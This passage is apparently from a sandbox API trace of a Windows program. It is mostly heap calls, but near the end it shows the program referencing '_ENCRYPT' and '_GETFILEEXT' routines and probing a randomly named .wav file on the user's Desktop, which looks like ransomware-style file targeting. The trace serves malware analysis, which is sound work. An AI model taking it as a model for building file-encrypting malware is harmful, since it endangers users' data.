lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.606] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.608] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0161.608] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0161.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.609] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.610] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0161.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0161.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.610] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0161.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0161.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0161.610] CloseHandle (hObject=0x120) returned 1 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.611] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0161.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.612] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0161.612] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0161.612] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0161.612] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.612] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0161.612] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0161.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.612] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.613] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.613] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d25ab0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0xbb9f920, ftLastAccessTime.dwHighDateTime=0x1d5d7fe, ftLastWriteTime.dwLowDateTime=0xbb9f920, ftLastWriteTime.dwHighDateTime=0x1d5d7fe, nFileSizeHigh=0x0, nFileSizeLow=0x10f89, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gx8HB3O7amX5sO9SwzMc.wav", cAlternateFileName="GX8HB3~1.WAV")) returned 0x90add8 [0161.626] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.626] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.626] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d25ab0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0xbb9f920, ftLastAccessTime.dwHighDateTime=0x1d5d7fe, ftLastWriteTime.dwLowDateTime=0xbb9f920, ftLastWriteTime.dwHighDateTime=0x1d5d7fe, nFileSizeHigh=0x0, nFileSizeLow=0x10f89, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gx8HB3O7amX5sO9SwzMc.wav", cAlternateFileName="GX8HB3~1.WAV")) returned 0x90add8 [0161.626] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.626] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS 